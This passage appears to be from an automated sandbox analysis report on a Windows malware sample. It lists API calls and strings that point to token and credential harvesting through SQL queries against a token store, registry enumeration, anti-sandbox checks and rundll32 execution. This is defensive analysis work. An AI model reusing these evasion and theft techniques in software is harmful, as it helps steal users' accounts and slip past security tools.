                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 729276229-0
                                                                                                                                                                                                                              • Opcode ID: 1228ebacb78d31f25c277ea55be27c99626425af329256098e025d0f3d603cf5
                                                                                                                                                                                                                              • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1228ebacb78d31f25c277ea55be27c99626425af329256098e025d0f3d603cf5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                              • API String ID: 224852652-4138519520
                                                                                                                                                                                                                              • Opcode ID: 289973c41d267e15cc15f44ba20e5b83e962fce2ffd0ae7a3877ef2d23b008d0
                                                                                                                                                                                                                              • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 289973c41d267e15cc15f44ba20e5b83e962fce2ffd0ae7a3877ef2d23b008d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                              • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                              • Opcode ID: c2b616fceb2b523f678ee6d1321162e3b7608a751921dbbbaf96c728ac70b21a
                                                                                                                                                                                                                              • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2b616fceb2b523f678ee6d1321162e3b7608a751921dbbbaf96c728ac70b21a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,02F65320,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,02F651A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                              • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                              • Opcode ID: 55ffac29f649c296db956f249058352f4885b1e427db91d4517fbeeb358ac779
                                                                                                                                                                                                                              • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55ffac29f649c296db956f249058352f4885b1e427db91d4517fbeeb358ac779
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,02F65B70,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,02F667E0,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F668A0), ref: 00411E2B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                                                                                                              • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                              • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                              • String ID: X@
                                                                                                                                                                                                                              • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                              • Opcode ID: 451bb91afc3fcd0e57f46d38bff2fbc94ba52b83269fb9665794973e6d732dbe
                                                                                                                                                                                                                              • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 451bb91afc3fcd0e57f46d38bff2fbc94ba52b83269fb9665794973e6d732dbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F46B38), ref: 00415F11
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F614B0), ref: 00415F2A
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61750), ref: 00415F42
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61648), ref: 00415F5A
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F616D8), ref: 00415F73
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F60C18), ref: 00415F8B
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F608B0), ref: 00415FA3
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F60650), ref: 00415FBC
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61720), ref: 00415FD4
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61708), ref: 00415FEC
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61678), ref: 00416005
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61600), ref: 0041601D
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F60950), ref: 00416035
                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F61618), ref: 0041604E
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                                                                                                • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                                • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1175201934-0
                                                                                                                                                                                                                              • Opcode ID: 266543c17844d5236548024853ce236f08ed3d40338f621c7fc1cfef9c255876
                                                                                                                                                                                                                              • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 266543c17844d5236548024853ce236f08ed3d40338f621c7fc1cfef9c255876
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00411307
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
                                                                                                                                                                                                                              • String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
                                                                                                                                                                                                                              • API String ID: 672783590-3078973353
                                                                                                                                                                                                                              • Opcode ID: 5945be777b7cb80882b8bfbf35dda8425c0d32a23119c823d2319c53a9c9f90d
                                                                                                                                                                                                                              • Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5945be777b7cb80882b8bfbf35dda8425c0d32a23119c823d2319c53a9c9f90d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F65680), ref: 0041244B
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F5F348), ref: 004124B7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F65AF0), ref: 004124DF
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
